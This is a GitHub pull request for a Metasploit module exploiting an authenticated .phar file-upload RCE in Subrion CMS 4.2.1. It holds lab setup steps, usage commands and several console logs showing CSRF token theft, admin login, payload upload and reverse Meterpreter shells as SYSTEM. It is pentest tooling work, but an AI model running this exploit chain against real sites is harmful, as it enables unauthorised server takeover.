-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add module and documentation for Subrion CMS v4.2.1 RCE #18211
Add module and documentation for Subrion CMS v4.2.1 RCE #18211
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for this module @ismaildawoodjee ! This looks great. I just left a few comments and suggestions for you to review when you get a chance. I'll start testing once it is done.
documentation/modules/exploit/linux/http/subrion_cms_file_upload_rce.md
Outdated
Show resolved
Hide resolved
|
||
LAMP is a recommended stack, so this module was tested on a Debian 10 VM along with the applications listed above. Installing Subrion can be somewhat tedious, and quite a few things can go wrong, so a quick and easy way would be to run the following script on a fresh image of Debian 10 with `sudo` user permissions. To be able to actually copy and paste the script, `open-vm-tools` and `open-vm-tools-desktop` need to be installed via `apt` if using VMware Workstation Player. Website links are also provided as reference to see what the commands are doing. | ||
|
||
Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code execution in this configuration, neither with a basic webshell nor with the `PhpEXE` mixin payload. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Did you get any error? Or maybe anything interesting in the server logs? We can hep to debug this and make it work on Windows too.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I downloaded and installed XAMPP 7.4.3 from here, and installed PHP 7.4.3 on Windows 10 and added to PATH. Expanded the Subrion 4.2.1 zip file in C:\xampp\htdocs\
and set it up easily.
After that I got quite a few warnings and deprecation notices, probably because it was PHP 7.4 and curly brace syntax was deprecated, but it probably wouldn't affect PHP file execution.
My initial hunch was that the PHP extension to execute .phar
files was not installed on the Windows 10 host but according to https://stackoverflow.com/questions/66868454/install-it-or-recompile-php-without-disable-phar-on-windows, phar
extensions are enabled by default and I also found phar
when running php -m
.
PS C:\WINDOWS\system32> php -v
PHP 7.4.3 (cli) (built: Feb 18 2020 17:29:46) ( ZTS Visual C++ 2017 x64 )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
PS C:\WINDOWS\system32> php -m
[PHP Modules]
bcmath
bz2
calendar
Core
ctype
curl
date
dom
exif
fileinfo
filter
ftp
gd
gettext
hash
iconv
json
libxml
mbstring
mysqli
mysqlnd
openssl
pcre
PDO
pdo_mysql
pdo_sqlite
Phar <<------<
readline
Reflection
session
SimpleXML
SPL
standard
tokenizer
xml
xmlreader
xmlwriter
zip
zlib
[Zend Modules]
Also disabled the phar.readonly
and phar.require_hash
settings in the php.ini
file. Restarted Apache and retested, but no luck:
I get this error when looking at the source code of the web page:
The Apache error.log
is ok, but to get the php_error_log
, you need to create a folder: https://stackoverflow.com/questions/43247952/php-error-log-missing-in-xampp
But there's nothing of note in the Apache access.log
or error.log
or php_error_log.txt
.
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…jee/metasploit-framework into subrion_cms_file_upload_rce
|
||
print_status('Checking Subrion CMS version...') | ||
version = res.body.match('Powered by <a href=.*') | ||
version_number = version.to_s.split.last.scan(/\d+/).join('.') if version |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is there are more straight forward way to parse out the version here?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I could parse it in a way similar to how I obtained the CSRF token.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Implemented changes on Lines 95-97
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for updating this @ismaildawoodjee. I just left a few more comments. I successfully tested using a Docker image and a Windows installation (see my comments below).
achieve remote code execution. In this module, a `.phar` file with a randomized name is uploaded and executed to receive a | ||
Meterpreter session on the target, then deletes itself afterwards. | ||
|
||
### Setup |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I managed to run version 4.1.0 using docker. I used a modified docker-compose.yml
from the official repository:
version: '3'
services:
subrion:
image: intelliants/subrion
container_name: subrion
links:
- subriondb:mysql
ports:
- 8080:80
environment:
SUBRION_DB_PASSWORD: secretpass
subriondb:
image: mysql:5.6
container_name: subriondb
environment:
MYSQL_ROOT_PASSWORD: secretpass
Then run docker-compose up
.
The config embedded in this docker image does not include .phar
file type to be parsed through the PHP handler . I needed to update the `/etc/apache2/conf-enabled/docker-php.conf' configuration file in the container and reload Apache:
❯ docker exec -ti subrion bash
root@f9e6aa4a9e5b:/var/www/html# sed -i'' 's/<FilesMatch .*/<FilesMatch \\.(php|phar)$>/' /etc/apache2/conf-enabled/docker-php.conf
root@f9e6aa4a9e5b:/var/www/html# /etc/init.d/apache2 reload
[ ok ] Reloading web server: apache2.
Then just finish the installation at http://127.0.0.1:8080/
with the following values:
DB Hostname: subriondb
DB Username: root
DB Password: secretpass
DB Name: subrion
DB Port: 3306 (default)
Table Prefix: sbr421_ (default)
Administrator Configuration:
Username: admin
Password: 123456
Confirm: 123456
Email: anyemail@mail.com
Please, would you mind adding this installation alternative to the documentation?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the additional testing. I'll try it out myself soon and add the results to the documentation.
Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code | ||
execution in this configuration, neither with a basic webshell nor with the `PhpEXE` mixin payload. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I managed to make it work on Windows. Same than the docker builds, the XAMPP's Apache configuration does not include the .phar
file type to be parsed through the PHP handler. This what I've done:
- Install XAMPP 7.4.3
- Modify
C:\xampp\apache\conf\extra\httpd-xampp.conf
Change this line:
<FilesMatch "\.php$">
to this:
<FilesMatch "\.(php|phar)$">
- Restart Apache
This is the Metasploit console output:
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.103 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.100.103/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: JV9hc6PcMf0fO9VF9uqEMkiWQvNBiredsOQuqYtb
[*] Logging in to Subrion Admin Panel at: http://192.168.100.103/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.100.103/subrion/uploads/ftxweolrol.phar
[*] Executing 'ftxweolrol.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.100.103
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.103:50048) at 2023-07-27 18:20:46 +0200
[+] Successfully executed payload: http://192.168.100.103/subrion/uploads/ftxweolrol.phar
meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer : WIN2019
OS : Windows NT WIN2019 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
Please, can you update the documentation with these Windows installation steps?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
That's great to know. So it was a XAMPP specific problem/configuration? I also tried an alternative installation using WAMP.NET and failed to get RCE. I'll look at it soon and add to the docs, a bit occupied at the moment.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Added the installation instructions for both Docker and XAMPP. If you don't mind, may I know how you found out about the configuration file not allowing execution of .phar
files? I searched and searched but could not find the solution 😕
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thank you for updating the documentation. I accessed the .phar
file directly with a browser after it had been uploaded by the module and noticed the php
code was not interpreted by the server. I've seen this before and immediately thought about a configuration issue. I had to look into all the configuration files to locate the correct FilesMatch
and modify it.
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
Thanks for updating this. Since it is a generic |
Sure, I'll do that. However, I noticed an issue with the The following exploits were against a XAMPP configuration on Windows 10, set up according to the instructions in the README. The Meterpreter session opens, but shell commands cannot be ran: msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 4ZYPtRV9oZEboIGk2LPXJEorkgwUnW3NoaNxw8HE
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1/uploads/hnhzicvsca.phar
[*] Executing 'hnhzicvsca.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:63453) at 2023-08-01 07:29:20 -0400
[+] Successfully executed payload: http://192.168.29.1/uploads/hnhzicvsca.phar
meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 14308 created.
Channel 0 created.
Microsoft Windows [Version 10.0.19045.3208]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads>whoami <<---------<< Here, the shell becomes unresponsive and the following prompt appears
Terminate channel 0? [y/N] y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter >
[*] 192.168.29.1 - Meterpreter session 1 closed. Reason: Died The Meterpreter session dies after I try to get another shell: msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit
[*] Started reverse TCP handler on 192.168.245.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 2252t69N1EcpnkeSx8J6qVcMtYfbgiskdBgOSRYE
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1/uploads/ymsmovwlju.phar
[*] Executing 'ymsmovwlju.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 3 opened (192.168.245.128:4444 -> 192.168.245.1:63495) at 2023-08-01 07:35:15 -0400
[+] Successfully executed payload: http://192.168.29.1/uploads/ymsmovwlju.phar
meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-50BU5J8
OS : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 1508 created.
Channel 0 created.
Microsoft Windows [Version 10.0.19045.3208]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads>dir
Terminate channel 0? [y/N] N
Terminate channel 0? [y/N] N
Terminate channel 0? [y/N] y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell
[*] 192.168.29.1 - Meterpreter session 3 closed. Reason: Died
[-] Error running command shell: Rex::TimeoutError Send timed out
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > Could you confirm that this also happens on your end? Perhaps I can raise an issue if it's not specific to my machine. |
Thanks for reporting this. I confirmed the issue is not related to your module. I tried with both PHP version 7.4.3 and 8.9.0 and got the same issue. On Metasploit console:
On the target:
|
@cdelafuente-r7 I believe this module should be good to go unless there's something else you'd like me to do. Feel free to review and do additional testing (maybe with proxies, etc.), or merge it whenever its convenient. Thanks for the reviews and troubleshooting with the XAMPP and Docker installations 💯 |
Thanks @ismaildawoodjee ! It looks good to me now. I retested everything and it works as expected. I'll go ahead and land it. Example outputSubrion CMS Version 4.1.0 on Docker
Subrion CMS Version 4.2.0 on Windows
|
Thank you @ismaildawoodjee for your contribution! |
Release NotesThis adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due an issue in the way the |
Complex Software Examples:
Setup
According to the official installation page, the setup for Subrion CMS v4.2.1 requires at least:
LAMP is a recommended stack, so this module was tested on a Debian 10 VM along with the applications listed above. Installing Subrion can be somewhat tedious, and quite a few things can go wrong, so a quick and easy way would be to run the following script on a fresh image of Debian 10 with
sudo
user permissions. To be able to actually copy and paste the script,open-vm-tools
andopen-vm-tools-desktop
need to be installed viaapt
if using VMware Workstation Player. Website links are also provided as reference to see what the commands are doing.Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code execution when using XAMPP in Windows, neither with a basic webshell nor with the
PhpEXE
mixin payload.Installation script on a fresh Debian 10 VM:
This will set up Subrion CMS 4.2.1 as a virtual host website on
http://subrion-vuln.com
using the LAMP stack:LAMP on Debian 10:
![lamp](https://private-user-images.githubusercontent.com/58870992/255287789-7f1439a4-efc3-48b6-8b2e-fe42a4061efb.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTg5OTI5OTQsIm5iZiI6MTcxODk5MjY5NCwicGF0aCI6Ii81ODg3MDk5Mi8yNTUyODc3ODktN2YxNDM5YTQtZWZjMy00OGI2LThiMmUtZmU0MmE0MDYxZWZiLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA2MjElMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNjIxVDE3NTgxNFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTRjYWZlYjdlNzJjMWIyODg3NTBkZGQ3Y2EzMmM3MjE2ODFjMjI0ZWI0YjAwMzc3ZTI3OGY4YTU5Yzc5OGQ3NzAmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.lnlfUB7vB8MA88_0KVoPy3b4U3c03o-G1m8PYNR9OFo)
Once this is done, and after the web browser opens up the Subrion CMS installation page at
![subrion_config](https://private-user-images.githubusercontent.com/58870992/255287838-86462b0b-ac15-4bc9-bbcf-7987f6d3efcb.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTg5OTI5OTQsIm5iZiI6MTcxODk5MjY5NCwicGF0aCI6Ii81ODg3MDk5Mi8yNTUyODc4MzgtODY0NjJiMGItYWMxNS00YmM5LWJiY2YtNzk4N2Y2ZDNlZmNiLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA2MjElMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNjIxVDE3NTgxNFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTI1YjFlOGFhMDA5ZTMyNTFhNDk4MWQwNGE2ZTc4ZDlkYmIwODgyYzJkMGZhMWFiN2ZlZTlhNzM5Y2MxMzVhZDUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.LPSvienxq4YKdEdU3PKctUwmwqbXHx4ptdNnwvTej2U)
http://subrion-vuln.com/install
, fill in the following fields in theConfiguration
page after passing thePre-Installation Check
and accepting theSubrion License
:Once the configuration is done, navigate to
![success](https://private-user-images.githubusercontent.com/58870992/255287874-93f3a8eb-ea80-4683-bf0c-083eb46f8d7e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTg5OTI5OTQsIm5iZiI6MTcxODk5MjY5NCwicGF0aCI6Ii81ODg3MDk5Mi8yNTUyODc4NzQtOTNmM2E4ZWItZWE4MC00NjgzLWJmMGMtMDgzZWI0NmY4ZDdlLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA2MjElMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNjIxVDE3NTgxNFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWM1NGU1OTMzMzM2M2M4ZTVmNmZjODZjZDhmNDlkZDkzODdhZjBiYmJlMmJiZTkwOGUwNDU3YjVkMWY4YzNlOGEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.bUcdeoIyMCv9uIpkc5lk6UiddD6eXuPfFJqBrLLy4Zw)
http://subrion-vuln.com/panel/
and login as an Administrator to confirm successful setup.Verification Steps
http://subrion-vuln.com/panel/
.msfconsole
and follow along with default optionsuse exploit/linux/http/subrion_cms_file_upload_rce
set RHOSTS [SUBRION_SERVER_IP]
set LHOST eth0
exploit
Options
RPORT (Required)
This is the default HTTP port 80 for the Subrion CMS website.
TARGETURI (Required)
This is the base path of the Subrion CMS's website. Can be changed in case the files are not installed as a VHost, for example, in
/var/www/html/subrion/*
and not in/var/www/subrion/*
USERNAME (Required)
This is the username for the Subrion CMS admin panel page, required for exploitation.
PASSWORD (Required)
This is the password for the Subrion CMS admin panel page, also required for exploitation.
Scenarios
Subrion CMS v4.2.1 on Debian 10
Subrion CMS v4.2.1 on Ubuntu 20.04 (Exfiltrated from Proving Grounds Practice)